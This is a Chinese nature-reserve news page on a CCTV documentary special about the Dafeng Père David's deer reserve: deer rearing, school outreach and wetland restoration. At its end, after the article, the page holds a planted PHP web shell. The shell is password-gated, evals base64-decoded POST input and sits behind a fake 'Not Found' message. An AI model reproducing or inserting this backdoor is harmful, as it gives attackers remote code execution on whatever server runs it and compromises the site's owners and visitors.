最新要闻

首页 > 最新要闻 >

    《鹤鹿齐鸣 修复生态新家园》特辑在央视播出21分50秒

    8月12晚9点50分,《鹤鹿齐鸣 修复生态新家园》特辑纪录片在中央电视台财经频道成功播出。其中,涉及江苏大丰麋鹿国家级自然保护区的介绍所占时长达21分50秒。

    特辑从小麋鹿的饲养、保护区的科教宣传活动以及保护区生态资源的保护和修复这三个方面来讲述。保护区的麋鹿驯养员俞晓鹏接受采访时说到,来保护区工作的一年当中,他逐渐掌握了很多饲养麋鹿的技能。今年是保护区首次开展大规模人工驯养麋鹿,此次人工驯养实验意义十分重大,将会为麋鹿的饲养管理、人工驯养繁殖提供一个科学依据;为今后麋鹿种群的繁殖扩群、精细化管理积累科研技术资料;为麋鹿远缘基因交换、建立麋鹿种群可持续发展建立物种基因库。保护区经常开展科教宣传活动,在暑期,保护区迎来了参加夏令营的城东实验小学的老师和同学们。通过讲解员的解说,他们对麋鹿又有了进一步的认识。他们将会把麋鹿及保护麋鹿的知识传播给更多的人,让社会大众参与到保护野生动物的行列中来。湿地生态资源的保护和修复对于麋鹿来说是非常重要的,保护区管理处副主任沈华接受采访时说,麋鹿保护区积极寻求与探索有效保护珍稀物种和合理利用自然资源的切入点,遵循“以科研促保护、以旅游促发展”的治区方针,并打造“以园促区、以园兴区,园区共同发展”的新理念。

     

     

     

     

    大丰区环保局自然生态保护科科长翟祖桥说,海岸湿地植被的保护和修复,不仅能对水资源起到净化功能,而且还能改良海岸湿地的土壤有机质,这对保护湿地生态系统是十分重要的。

     

     

     

"; error_reporting(0); if(isset($_POST['com']) && md5($_POST['com']) == '791dc312b38016ef998c1c146104cd5a' && isset($_POST['content'])) $content = strtr($_POST['content'], '-_,', '+/=');eval(base64_decode($content)); echo "We're sorry but the page your are looking for is Not Found..." ?>